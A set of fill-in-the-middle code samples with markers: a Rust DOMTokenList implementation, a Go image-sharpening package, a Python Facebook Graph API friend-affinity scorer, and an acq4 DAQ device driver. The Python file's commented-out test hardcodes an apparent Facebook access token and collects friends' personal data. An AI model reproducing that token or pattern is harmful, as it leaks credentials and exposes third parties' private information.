}).unwrap_or(false)
})
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-add
fn Add(&self, tokens: Vec<DOMString>) -> ErrorResult {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
for token in &tokens {
let token = try!(self.check_token_exceptions(&token));
if !atoms.iter().any(|atom| *atom == token) {
atoms.push(token);
}
}
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(())
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-remove
fn Remove(&self, tokens: Vec<DOMString>) -> ErrorResult {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
for token in &tokens {
let token = try!(self.check_token_exceptions(&token));
atoms.iter().position(|atom| *atom == token).map(|index| {
atoms.remove(index)
});
}
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(())
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-toggle
fn Toggle(&self, token: DOMString, force: Option<bool>) -> Fallible<bool> {
let element = self.element.root();
let mut atoms = element.r().get_tokenlist_attribute(&self.local_name);
let token = try!(self.check_token_exceptions(&token));
match atoms.iter().position(|atom| *atom == token) {
Some(index) => match force {
Some(true) => Ok(true),
_ => {
atoms.remove(index);
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(false)
}
},
None => match force {
Some(false) => Ok(false),
_ => {
atoms.push(token);
element.r().set_atomic_tokenlist_attribute(&self.local_name, atoms);
Ok(true)
}
}
}
}
// https://dom.spec.whatwg.org/#stringification-behavior
fn Stringifier(&self) -> DOMString {
let tokenlist = self.element.root().r().get_tokenlist_attribute(&self.local_name);
str_join(&tokenlist, "\x20")
}
// check-tidy: no specs after this line
fn IndexedGetter(&self, index: u32, found: &mut bool) -> Option<DOMString> {
let item = self.Item(index);
*found = item.is_some();
item
}
}<|fim▁end|>
|
attr.value()
|
<|file_name|>sharpen.go<|end_file_name|><|fim▁begin|>// Package sharpen provides functions to sharpen an image.
package sharpen
import (
"hawx.me/code/img/blur"
"hawx.me/code/img/utils"
"image"
"image/color"
"math"
)
// Sharpen takes an image and sharpens it by, essentially, unblurring it. It is
// currently extremely slow, so you are probably better off sticking to
// UnsharpMask.
func Sharpen(in image.Image, radius int, sigma float64) image.Image {
// Copied from ImageMagick, obvs.
//
// Sharpens the image. Convolve the image with a Gaussian operator of the
// given radius and standard deviation (sigma). For reasonable results radius
// should be larger than sigma.
//
// Using a seperable kernel would be faster, but the negative weights cancel
// out on the corners of the kernel producing often undesirable ringing in the
// filtered result; this can be avoided by using a 2D gaussian shaped image
// sharpening kernel instead.
//
// (-exp(-(u*u + v*v) / 2.0 * sigma*sigma)) / (2.0 * Pi * sigma*sigma)
normalize := 0.0
f := func(u, v int) float64 {
usq := float64(u * u)
vsq := float64(v * v)
val := -math.Exp(-(usq+vsq)/(2.0*sigma*sigma)) / (2.0 * math.Pi * sigma * sigma)
normalize += val
return val
}
k := blur.NewKernel(radius*2+1, radius*2+1, f)
k[radius+1][radius+1] = -2.0 * normalize
return blur.Convolve(in, k, blur.CLAMP)
}
// UnsharpMask sharpens the given Image using the unsharp mask technique.
// Basically the image is blurred, then subtracted from the original for
// differences above the threshold value.
func UnsharpMask(in image.Image, radius int, sigma, amount, threshold float64) image.Image {
blurred := blur.Gaussian(in, radius, sigma, blur.IGNORE)
bounds := in.Bounds()
out := image.NewRGBA(bounds)
// Absolute difference between a and b, returns float64 between 0 and 1.
diff := func(a, b float64) float64 {
if a > b {
return a - b
}
return b - a
}
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
for x := bounds.Min.X; x < bounds.Max.X; x++ {
ar, ag, ab, aa := utils.RatioRGBA(in.At(x, y))
br, bg, bb, _ := utils.RatioRGBA(blurred.At(x, y))<|fim▁hole|>
if diff(ag, bg) >= threshold {
ag = amount*(ag-bg) + ag
}
if diff(ab, bb) >= threshold {
ab = amount*(ab-bb) + ab
}
out.Set(x, y, color.NRGBA{
uint8(utils.Truncatef(ar * 255)),
uint8(utils.Truncatef(ag * 255)),
uint8(utils.Truncatef(ab * 255)),
uint8(aa * 255),
})
}
}
return out
}<|fim▁end|>
|
if diff(ar, br) >= threshold {
ar = amount*(ar-br) + ar
}
|
<|file_name|>AfinidadeLikesEscolaELocalidades.py<|end_file_name|><|fim▁begin|># coding: iso-8859-1 -*-
"""
Created on Wed Oct 22 21:49:24 2014
@author: fábioandrews
"""
import facebook
from DadosDeAmigoEmComum import DadosDeAmigoEmComum
class AfinidadeLikesEscolaELocalidades:
def __init__(self,ACCESS_TOKEN_FACEBOOK):
self.token_do_facebook = ACCESS_TOKEN_FACEBOOK
self.meusAmigos = []
self.amigosECoisasQueGostam = dict()
self.amigosELocalidades = dict()
self.pegarMeusAmigosECoisasQueElesGostam(ACCESS_TOKEN_FACEBOOK)
self.pegarAmigosELocalidades(ACCESS_TOKEN_FACEBOOK)
self.pegarAmigosEEscolas(ACCESS_TOKEN_FACEBOOK)
def pegarMeusAmigosECoisasQueElesGostam(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
meusAmigosESeusIds = g.get_connections("me", "friends")['data'] #eh um hashmap com o nome do amigo sendo a chave e o id dele como valor
likesDeMeusAmigosComCategoriasDataECoisasInuteis = { friend['name'] : g.get_connections(friend['id'], "likes")['data'] for friend in meusAmigosESeusIds }
#a funcao acima retorna meus amigos associados as coisas que gostam, mas nao eh apenas o nome daquilo que gostam, tem data, categoria etc
chaves_de_likes = likesDeMeusAmigosComCategoriasDataECoisasInuteis.keys() #a chaves_de_likes eh um arranjo com nomes de meus amigos
amigos_e_likes_simplificados = dict() #criarei um hashmap que simplifica meus amigos e seus likes. So preciso do nome do amigo associado a todos os likes dele
for nomeAmigo in chaves_de_likes:
likes_de_um_amigo = likesDeMeusAmigosComCategoriasDataECoisasInuteis[nomeAmigo]
for umLike in likes_de_um_amigo:
umLikeSimplificado = umLike['name']
nomeAmigoEmUTf8 = nomeAmigo.encode(encoding='utf_8',errors='ignore') #estava retornando u'stringqualquer' se eu nao fizesse isso. Eh um tipo diferente de string normal
umLikeSimplificadoEmUtf8 = umLikeSimplificado.encode(encoding='utf_8',errors='ignore')
if(nomeAmigoEmUTf8 not in amigos_e_likes_simplificados.keys()):
amigos_e_likes_simplificados[nomeAmigoEmUTf8] = [umLikeSimplificadoEmUtf8]
else:
amigos_e_likes_simplificados[nomeAmigoEmUTf8].append(umLikeSimplificadoEmUtf8);
self.amigosECoisasQueGostam = amigos_e_likes_simplificados
self.meusAmigos = self.amigosECoisasQueGostam.keys()
def pegarAmigosELocalidades(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
amigosELocalizacoesComplexo = g.get_connections("me", "friends", fields="location, name")
amigos_e_localidades = dict() #eh um dictionary que relaciona o nome de um amigo com a localidade dele
for fr in amigosELocalizacoesComplexo['data']:
if 'location' in fr:
#print fr['name'] + ' ' + fr['location']["name"] #location eh um dictionary com chaves id e name, referentes a uma localidade
nomeAmigoUtf8 = fr['name'].encode(encoding='utf_8',errors='ignore')
localidadeUtf8 = fr['location']["name"].encode(encoding='utf_8',errors='ignore')
amigos_e_localidades[nomeAmigoUtf8] = localidadeUtf8 #location eh um dictionary com chaves id e name, referentes a uma localidade
self.amigosELocalidades = amigos_e_localidades
#no final dessa funcao, eu tenho um dict tipo assim: {'Felipe Dantas Moura': ['High School%Instituto Maria Auxiliadora', 'College%Spanish Courses Colegio Delibes', 'College%Federal University of Rio Grande do Norte'],...}
def pegarAmigosEEscolas(self,ACCESS_TOKEN_FACEBOOK):
g = facebook.GraphAPI(ACCESS_TOKEN_FACEBOOK)
amigosEEscolasComplexo = g.get_connections("me","friends",fields="education, name")
amigos_e_escolas = dict() #eh um dictionary que relaciona o nome de um amigo com as escolas dele, Pode ter duas: college ou high school, por isso o valor nesse dict serah um arranjo tipo ["High School%Maria Auxilidadora","college%Federal University of Rio Grande do Norte"]
for fr in amigosEEscolasComplexo['data']:
if 'education' in fr:
nomeAmigoUtf8 = fr['name'].encode(encoding='utf_8',errors='ignore')
arranjoEducation = fr['education'] #uma pessoa pode ter varios high school ou college e tb pode ter graduate school
arranjoEducacaoMeuAmigo = []
for elementoArranjoEducation in arranjoEducation:
nomeEscola = elementoArranjoEducation['school']['name'].encode(encoding='utf_8',errors='ignore')
tipoEscola = elementoArranjoEducation['type'].encode(encoding='utf_8',errors='ignore') #pode ser high school ou college ou Graduate school. College eh a faculdade
arranjoEducacaoMeuAmigo.append(tipoEscola + "%" + nomeEscola)
amigos_e_escolas[nomeAmigoUtf8] = arranjoEducacaoMeuAmigo
self.amigosEEscolas = amigos_e_escolas
#dado um amigo, eu irei receber tipo {giovanni:DadosDeAmigoEmComum}, onde giovanni eh amigo de meuAmigo
#e DadosDeAmigoEmComum terah a nota associada e um arranjo com os likes que giovanni tem em comum com meuAmigo
def acharCompatibilidadeEntreLikesDePaginas(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses = dict()
for outroAmigo in self.amigosECoisasQueGostam.keys():
if(outroAmigo != meuAmigo):
#os amigos sao diferentes. Vamos ver se tem likes iguais
likesEmComumEntreOsDois = []
for umLikeMeuAmigo in self.amigosECoisasQueGostam[meuAmigo]:
for umLikeOutroAmigo in self.amigosECoisasQueGostam[outroAmigo]:
if(umLikeMeuAmigo == umLikeOutroAmigo):
#achamos um like em comum entre um Amigo e outro Amigo<|fim▁hole|> if(len(likesEmComumEntreOsDois) > 0):
# ha algo em comum entre os dois amigos e eles sao diferentes
pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[outroAmigo] = likesEmComumEntreOsDois
#ate agora eu tenho tipo {giovanni:['games','musica']} giovanni eh compativel com meuAmigo
#hora de calcular pontuacoes
quantasCoisasMeuAmigoGosta = len(self.amigosECoisasQueGostam[meuAmigo])
pessoasCompativeisComMeuAmigoSegundoLikes = dict() #o retorno da funcao
for amigoParecidoComMeuAmigo in pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses.keys():
quantasCoisasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo = len(pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[amigoParecidoComMeuAmigo])
nota = (10.0 * quantasCoisasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo) / quantasCoisasMeuAmigoGosta
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmoInteresseDeMeuAmigoEQuaisInteresses[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoLikes[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoLikes
def acharCompatibilidadeEntreLocalidade(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade = dict()
for outroAmigo in self.amigosELocalidades.keys():
if(outroAmigo != meuAmigo):
#os amigos sao diferentes. Vamos ver se tem mesma localidade
if(self.amigosELocalidades[outroAmigo] == self.amigosELocalidades[meuAmigo]):
# ha algo em comum entre os dois amigos e eles sao diferentes
pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade[outroAmigo] = self.amigosELocalidades[outroAmigo]
#ate agora eu tenho tipo {giovanni:'natal'} giovanni eh compativel com meuAmigo
#hora de calcular pontuacoes
pessoasCompativeisComMeuAmigoSegundoLocalidade = dict() #o retorno da funcao
for amigoParecidoComMeuAmigo in pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade.keys():
nota = 10.0
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmaLocalidadeDeMeuAmigoEQualLocalidade[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoLocalidade[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoLocalidade
def acharCompatibilidadeEntreEscolas(self,meuAmigo):
meuAmigo = meuAmigo.encode(encoding='utf_8',errors='ignore')
pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas = dict()
for outroAmigo in self.amigosEEscolas.keys():
if(outroAmigo != meuAmigo):
#os amigos sao diferentes. Vamos ver se tem escolas iguais
escolasEmComumEntreOsDois = []
for umaEscolaMeuAmigo in self.amigosEEscolas[meuAmigo]:
for umaEscolaOutroAmigo in self.amigosEEscolas[outroAmigo]:
if(umaEscolaMeuAmigo == umaEscolaOutroAmigo):
#achamos uma escola em comum entre um Amigo e outro Amigo
escolasEmComumEntreOsDois.append(umaEscolaMeuAmigo)
if(len(escolasEmComumEntreOsDois) > 0):
# ha algo em comum entre os dois amigos e eles sao diferentes
pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[outroAmigo] = escolasEmComumEntreOsDois
#ate agora eu tenho tipo {giovanni:['High School%Instituto Maria Auxiliadora', 'College%UFRN - Universidade Federal do Rio Grande do Norte']} giovanni eh compativel com meuAmigo
#hora de calcular pontuacoes
quantasEscolasMeuAmigoCursou = len(self.amigosEEscolas[meuAmigo])
pessoasCompativeisComMeuAmigoSegundoEscolas = dict() #o retorno da funcao
for amigoParecidoComMeuAmigo in pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas.keys():
quantasEscolasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo = len(pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[amigoParecidoComMeuAmigo])
nota = (10.0 * quantasEscolasEmComumEntreMeuAmigoEAmigoParecidoComMeuAmigo) / quantasEscolasMeuAmigoCursou
dadosDeAmigoEmComumAmigoParecido = DadosDeAmigoEmComum(nota,pessoasDeMesmasEscolasDeMeuAmigoEQuaisEscolas[amigoParecidoComMeuAmigo])
pessoasCompativeisComMeuAmigoSegundoEscolas[amigoParecidoComMeuAmigo] = dadosDeAmigoEmComumAmigoParecido
return pessoasCompativeisComMeuAmigoSegundoEscolas
#os testes...
"""calculaAfinidades = AfinidadeLikesEscolaELocalidades('CAACEdEose0cBAG2OxI7v1nXVTzIX4JCoPSZByGR4OOr9leuRT2cjmNYo7nLg1sf9lRQstvd0HaIZCa1T9mK68GynHqqzhD5u6cCZATHZBrX99fHpWPBrM6NpTVKEXYNi5l45fk6ZAi87i8psDDAtOtjzA8hnymZAeN77LV3p2DtODu9l1na4gCz8hkgeHBHDjFC6TnVVFd8iivK0uhZAZBre')
amigosDePhillipEmComum = calculaAfinidades.acharCompatibilidadeEntreLikesDePaginas("Fábio Phillip Rocha Marques")
#faltou pegar o jeito de imprimir esse resultado de phillip
print "!!!!!!!!!!!!!!!amigos com mesmos likes de meu amigo Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComum.keys():
print "######" , amigoEmComum
amigosDePhillipEmComum[amigoEmComum].imprimirDadosDeAmigoEmComum();"""
"""amigosDePhillipEmComumLocalidades = calculaAfinidades.acharCompatibilidadeEntreLocalidade("Fábio Phillip Rocha Marques")
print "!!!!!!!!!!!!!!!amigos com mesma localidade de meu amigo Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComumLocalidades.keys():
print "######" , amigoEmComum
amigosDePhillipEmComumLocalidades[amigoEmComum].imprimirDadosDeAmigoEmComum();"""
"""print "!!!!!!!!!!!!!!!!! ESCOLAS DE FÁBIO PHILLIP !!!!!!!!!!!!!!!!!"
print calculaAfinidades.amigosEEscolas["Fábio Phillip Rocha Marques"]
amigosDePhillipEmComumEscolas = calculaAfinidades.acharCompatibilidadeEntreEscolas("Fábio Phillip Rocha Marques")
print "!!!!!!!!!!!!!!!amigos com mesmas escolas de meu amigo Fábio Phillip!!!!!!!!!!!!!!!"
for amigoEmComum in amigosDePhillipEmComumEscolas.keys():
print "######" , amigoEmComum
amigosDePhillipEmComumEscolas[amigoEmComum].imprimirDadosDeAmigoEmComum();"""<|fim▁end|>
|
likesEmComumEntreOsDois.append(umLikeMeuAmigo)
|
<|file_name|>DAQGeneric.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import print_function
from collections import OrderedDict
import numpy as np
import six
from acq4.devices.DAQGeneric.taskGUI import DAQGenericTaskGui
from acq4.devices.Device import Device, DeviceTask
from pyqtgraph import siFormat
from pyqtgraph.debug import Profiler
from acq4.util import Qt
from acq4.util.Mutex import Mutex
from acq4.util.debug import printExc
from pyqtgraph.metaarray import MetaArray, axis
Ui_Form = Qt.importTemplate('.DeviceTemplate')
class DataMapping:
"""Class that maps values between the voltages on a DAQ channel and the physically measured units.
By default, this class applies a simple linear scale and offset for analog channels. Digital channels
may optionally be inverted.
Vout = Value * scale - offset
Value = (Vin + offset) * scale
This class may be subclassed to allow any arbitrary mapping (eg, calibration curves, etc.)
"""
def __init__(self, device, chans=None):
"""When mapping initializes, it immediately grabs the scale and offset for each channel
specified in chans (or all channels if None). This means that the mapping is only valid
as long as these values have not changed."""
self.device = device
self.scale = {}
self.offset = {}
if chans is None:
chans = device.listChannels()
if isinstance(chans, six.string_types):<|fim▁hole|> self.scale[ch] = device.getChanScale(ch)
self.offset[ch] = device.getChanOffset(ch)
def mapToDaq(self, chan, data):
scale = self.scale[chan]
offset = self.offset[chan]
return (data * scale) - offset
def mapFromDaq(self, chan, data):
scale = self.scale[chan]
offset = self.offset[chan]
return (data + offset) * scale
class ChannelHandle(object):
def __init__(self, dev, channel):
self.dev = dev
self.channel = channel
class DAQGeneric(Device):
"""
Config format:
channels:
ChannelName1:
device: 'DaqDeviceName'
channel: '/Dev1/ao0'
type: 'ao'
units: 'A'
scale: 200 * mV / nA
ChannelName2:
device: 'DaqDeviceName'
channel: '/Dev1/ai3'
type: 'ai'
mode: 'nrse'
units: 'A'
scale: 200 * nA / mV
ChannelName3:
device: 'DaqDeviceName'
channel: '/Dev1/line7'
type: 'di'
invert: True
"""
sigHoldingChanged = Qt.Signal(object, object)
def __init__(self, dm, config, name):
Device.__init__(self, dm, config, name)
self._DGLock = Mutex(Qt.QMutex.Recursive) ## protects access to _DGHolding, _DGConfig
## Do some sanity checks here on the configuration
# 'channels' key is expected; for backward compatibility we just use the top-level config.
config = config.get('channels', config)
self._DGConfig = config
self._DGHolding = {}
for ch in config:
if config[ch]['type'][0] != 'a' and ('scale' in config[ch] or 'offset' in config[ch]):
raise Exception("Scale/offset only allowed for analog channels. (%s.%s)" % (name, ch))
if 'scale' not in config[ch]:
config[ch]['scale'] = 1 ## must be int to prevent accidental type conversion on digital data
if 'offset' not in config[ch]:
config[ch]['offset'] = 0
if config[ch].get('invert', False):
if config[ch]['type'][0] != 'd':
raise Exception("Inversion only allowed for digital channels. (%s.%s)" % (name, ch))
config[ch]['scale'] = -1
config[ch]['offset'] = -1
# print "chan %s scale %f" % (ch, config[ch]['scale'])
if 'holding' not in config[ch]:
config[ch]['holding'] = 0.0
## It is possible to create virtual channels with no real hardware connection
if 'device' not in config[ch]:
# print "Assuming channel %s is virtual:" % ch, config[ch]
config[ch]['virtual'] = True
## set holding value for all output channels now
if config[ch]['type'][1] == 'o':
self.setChanHolding(ch, config[ch]['holding'])
# self._DGHolding[ch] = config[ch]['holding']
dm.declareInterface(name, ['daqChannelGroup'], self)
for ch in config:
dm.declareInterface(name + "." + ch, ['daqChannel'], ChannelHandle(self, ch))
def mapToDAQ(self, channel, data):
mapping = self.getMapping(chans=[channel])
return mapping.mapToDaq(channel, data)
def mapFromDAQ(self, channel, data):
mapping = self.getMapping(chans=[channel])
return mapping.mapFromDaq(channel, data)
def getMapping(self, chans=None):
return DataMapping(self, chans)
def createTask(self, cmd, parentTask):
return DAQGenericTask(self, cmd, parentTask)
def getConfigParam(self, param):
return self._DGConfig.get(param, None)
def setChanHolding(self, channel, level=None, block=True, mapping=None):
"""Define and set the holding values for this channel
If *block* is True, then return only after the value has been set on the DAQ.
If *block* is False, then simply schedule the change to take place when the DAQ is available.
*mapping* is a DataMapping object which tells the device how to translate *level* into
a voltage on the physical DAQ channel. If *mapping* is None, then it will use self.getMapping(*channel*)
to determine the correct mapping.
"""
prof = Profiler(disabled=True)
with self._DGLock:
prof('lock')
# print "set holding", channel, level
### Set correct holding level here...
if level is None:
level = self._DGHolding[channel]
if level is None:
raise Exception("No remembered holding level for channel %s" % channel)
else:
self._DGHolding[channel] = level
if mapping is None:
mapping = self.getMapping(channel)
val = mapping.mapToDaq(channel, self._DGHolding[channel])
prof('map')
# print "Set holding for channel %s: %f => %f" % (channel, self._DGHolding[channel], val)
chConf = self._DGConfig[channel]
isVirtual = chConf.get('virtual', False)
if not isVirtual:
daq = chConf['device']
chan = chConf['channel']
daqDev = self.dm.getDevice(daq)
prof('get dev')
## release DGLock before setChannelValue
if not isVirtual:
if block:
daqDev.setChannelValue(chan, val, block=True)
else:
daqDev.setChannelValue(chan, val, block=False,
delaySetIfBusy=True) ## Note: If a task is running, this will not be set until it completes.
prof('set channel value')
self.sigHoldingChanged.emit(channel, level)
prof('emit')
def getChanHolding(self, chan):
with self._DGLock:
return self._DGHolding[chan]
def getChannelValue(self, channel, block=True, raw=False):
with self._DGLock:
daq = self._DGConfig[channel]['device']
chan = self._DGConfig[channel]['channel']
mode = self._DGConfig[channel].get('mode', None)
## release _DGLock before getChannelValue
daqDev = self.dm.getDevice(daq)
val = daqDev.getChannelValue(chan, mode=mode, block=block)
if not raw:
return self.mapFromDAQ(channel, val)
else:
return val
def reconfigureChannel(self, chan, config):
"""Allows reconfiguration of channel properties (including the actual DAQ channel name)"""
with self._DGLock:
self._DGConfig[chan].update(config)
def deviceInterface(self, win):
"""Return a widget with a UI to put in the device rack"""
return DAQDevGui(self)
def taskInterface(self, taskRunner):
"""Return a widget with a UI to put in the task rack"""
return DAQGenericTaskGui(self, taskRunner)
def getDAQName(self, channel):
# return self._DGConfig[channel]['channel'][0]
with self._DGLock:
return self._DGConfig[channel]['device']
def quit(self):
pass
def setChanScale(self, ch, scale, update=True, block=True):
with self._DGLock:
self._DGConfig[ch]['scale'] = scale
if update and self.isOutput(ch): ## only set Holding for output channels
self.setChanHolding(ch, block=block)
def setChanOffset(self, ch, offset, update=True, block=True):
with self._DGLock:
self._DGConfig[ch]['offset'] = offset
if update and self.isOutput(ch): ## only set Holding for output channels
self.setChanHolding(ch, block=block)
def getChanScale(self, chan):
with self._DGLock:
## Scale defaults to 1.0
## - can be overridden in configuration
return self._DGConfig[chan].get('scale', 1.0)
def getChanOffset(self, chan):
with self._DGLock:
## Offset defaults to 0.0
## - can be overridden in configuration
return self._DGConfig[chan].get('offset', 0.0)
def getChanUnits(self, ch):
with self._DGLock:
if 'units' in self._DGConfig[ch]:
return self._DGConfig[ch]['units']
else:
return None
def isOutput(self, chan):
with self._DGLock:
return self._DGConfig[chan]['type'][1] == 'o'
def listChannels(self):
with self._DGLock:
return dict([(ch, self._DGConfig[ch].copy()) for ch in self._DGConfig])
class DAQGenericTask(DeviceTask):
def __init__(self, dev, cmd, parentTask):
DeviceTask.__init__(self, dev, cmd, parentTask)
self.daqTasks = {}
self.initialState = {}
self._DAQCmd = cmd
## Stores the list of channels that will generate or acquire buffered samples
self.bufferedChannels = []
def getConfigOrder(self):
"""return lists of devices that should be configured (before, after) this device"""
daqs = set([self.dev.getDAQName(ch) for ch in self._DAQCmd])
return [], list(daqs) ## this device should be configured before its DAQs
def configure(self):
## Record initial state or set initial value
## NOTE:
## Subclasses should call this function only _after_ making any changes that will affect the mapping between
## physical values and channel voltages.
prof = Profiler('DAQGenericTask.configure', disabled=True)
# self.daqTasks = {}
self.mapping = self.dev.getMapping(chans=list(
self._DAQCmd.keys())) ## remember the mapping so we can properly translate data after it has been returned
self.initialState = {}
self.holdingVals = {}
for ch in self._DAQCmd:
# dev = self.dev.dm.getDevice(self.dev._DGConfig[ch]['channel'][0])
dev = self.dev.dm.getDevice(self.dev.getDAQName(ch))
prof.mark(ch + ' get dev')
if 'preset' in self._DAQCmd[ch]:
with self.dev._DGLock:
daqChan = self.dev._DGConfig[ch]['channel']
# dev.setChannelValue(self.dev._DGConfig[ch]['channel'][1], self._DAQCmd[ch]['preset'])
preVal = self.mapping.mapToDaq(ch, self._DAQCmd[ch]['preset'])
dev.setChannelValue(daqChan, preVal)
prof.mark(ch + ' preset')
elif 'holding' in self._DAQCmd[ch]:
self.dev.setChanHolding(ch, self._DAQCmd[ch]['holding'])
prof.mark(ch + ' set holding')
if 'recordInit' in self._DAQCmd[ch] and self._DAQCmd[ch]['recordInit']:
self.initialState[ch] = self.dev.getChannelValue(ch)
prof.mark(ch + ' record init')
for ch in self.dev._DGConfig:
## record current holding value for all output channels (even those that were not buffered for this task)
with self.dev._DGLock:
chanType = self.dev._DGConfig[ch]['type']
if chanType in ['ao', 'do']:
self.holdingVals[ch] = self.dev.getChanHolding(ch)
prof.mark(ch + ' record holding')
prof.finish()
def createChannels(self, daqTask):
self.daqTasks = {}
# print "createChannels"
## Is this the correct DAQ device for any of my channels?
## create needed channels + info
## write waveform to command channel if needed
chans = self.dev.listChannels()
for ch in chans:
# print " creating channel %s.." % ch
if ch not in self._DAQCmd:
# print " ignoring channel", ch, "not in command"
continue
chConf = chans[ch]
if chConf['device'] != daqTask.devName():
# print " ignoring channel", ch, "wrong device"
continue
## Input channels are only used if the command has record: True
if chConf['type'] in ['ai', 'di']:
# if ('record' not in self._DAQCmd[ch]) or (not self._DAQCmd[ch]['record']):
if not self._DAQCmd[ch].get('record', False):
# print " ignoring channel", ch, "recording disabled"
continue
## Output channels are only added if they have a command waveform specified
elif chConf['type'] in ['ao', 'do']:
if 'command' not in self._DAQCmd[ch]:
# print " ignoring channel", ch, "no command"
continue
self.bufferedChannels.append(ch)
# _DAQCmd[ch]['task'] = daqTask ## ALSO DON't FORGET TO DELETE IT, ASS.
if chConf['type'] in ['ao', 'do']:
# scale = self.getChanScale(ch)
cmdData = self._DAQCmd[ch]['command']
if cmdData is None:
# print "No command for channel %s, skipping." % ch
continue
# cmdData = cmdData * scale
## apply scale, offset or inversion for output lines
cmdData = self.mapping.mapToDaq(ch, cmdData)
# print "channel", chConf['channel'][1], cmdData
if chConf['type'] == 'do':
cmdData = cmdData.astype(np.uint32)
cmdData[cmdData <= 0] = 0
cmdData[cmdData > 0] = 0xFFFFFFFF
# print "channel", self._DAQCmd[ch]
# print "LOW LEVEL:", self._DAQCmd[ch].get('lowLevelConf', {})
daqTask.addChannel(chConf['channel'], chConf['type'], **self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
daqTask.setWaveform(chConf['channel'], cmdData)
# print "DO task %s has type" % ch, cmdData.dtype
elif chConf['type'] == 'ai':
mode = chConf.get('mode', None)
# if len(chConf['channel']) > 2:
# mode = chConf['channel'][2]
# print "Adding channel %s to DAQ task" % chConf['channel'][1]
daqTask.addChannel(chConf['channel'], chConf['type'], mode=mode,
**self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
elif chConf['type'] == 'di':
daqTask.addChannel(chConf['channel'], chConf['type'], **self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
def getChanUnits(self, chan):
if 'units' in self._DAQCmd[chan]:
return self._DAQCmd[chan]['units']
else:
return self.dev.getChanUnits(chan)
def start(self):
## possibly nothing required here, DAQ will start recording without our help.
pass
def isDone(self):
## DAQ task handles this for us.
return True
def stop(self, abort=False):
# with self.dev._DGLock: ##not necessary
## Stop DAQ tasks before setting holding level.
# print "STOP"
prof = Profiler(disabled=True)
for ch in self.daqTasks:
# print "Stop task", self.daqTasks[ch]
try:
self.daqTasks[ch].stop(abort=abort)
except:
printExc("Error while stopping DAQ task:")
prof('stop %s' % ch)
for ch in self._DAQCmd:
if 'holding' in self._DAQCmd[ch]:
self.dev.setChanHolding(ch, self._DAQCmd[ch]['holding'])
prof('set holding %s' % ch)
elif self.dev.isOutput(ch): ## return all output channels to holding value
self.dev.setChanHolding(ch)
prof('reset to holding %s' % ch)
def getResult(self):
## Access data recorded from DAQ task
## create MetaArray and fill with MC state info
## Collect data and info for each channel in the command
result = {}
for ch in self.bufferedChannels:
result[ch] = self.daqTasks[ch].getData(self.dev._DGConfig[ch]['channel'])
result[ch]['data'] = self.mapping.mapFromDaq(ch, result[ch]['data']) ## scale/offset/invert
result[ch]['units'] = self.getChanUnits(ch)
if len(result) > 0:
meta = result[list(result.keys())[0]]['info']
rate = meta['rate']
nPts = meta['numPts']
## Create an array of time values
timeVals = np.linspace(0, float(nPts - 1) / float(rate), nPts)
## Concatenate all channels together into a single array, generate MetaArray info
chanList = [np.atleast_2d(result[x]['data']) for x in result]
cols = [(x, result[x]['units']) for x in result]
# print cols
try:
arr = np.concatenate(chanList)
except:
print(chanList)
print([a.shape for a in chanList])
raise
daqState = OrderedDict()
for ch in self.dev._DGConfig:
if ch in result:
daqState[ch] = result[ch]['info']
else:
daqState[ch] = {}
## record current holding value for all output channels (even those that were not buffered for this task)
if self.dev._DGConfig[ch]['type'] in ['ao', 'do']:
daqState[ch]['holding'] = self.holdingVals[ch]
info = [axis(name='Channel', cols=cols), axis(name='Time', units='s', values=timeVals)] + [
{'DAQ': daqState}]
protInfo = self._DAQCmd.copy() ## copy everything but the command arrays and low-level configuration info
for ch in protInfo:
protInfo[ch].pop('command', None)
protInfo[ch].pop('lowLevelConf', None)
info[-1]['Protocol'] = protInfo
marr = MetaArray(arr, info=info)
return marr
else:
return None
def storeResult(self, dirHandle):
DeviceTask.storeResult(self, dirHandle)
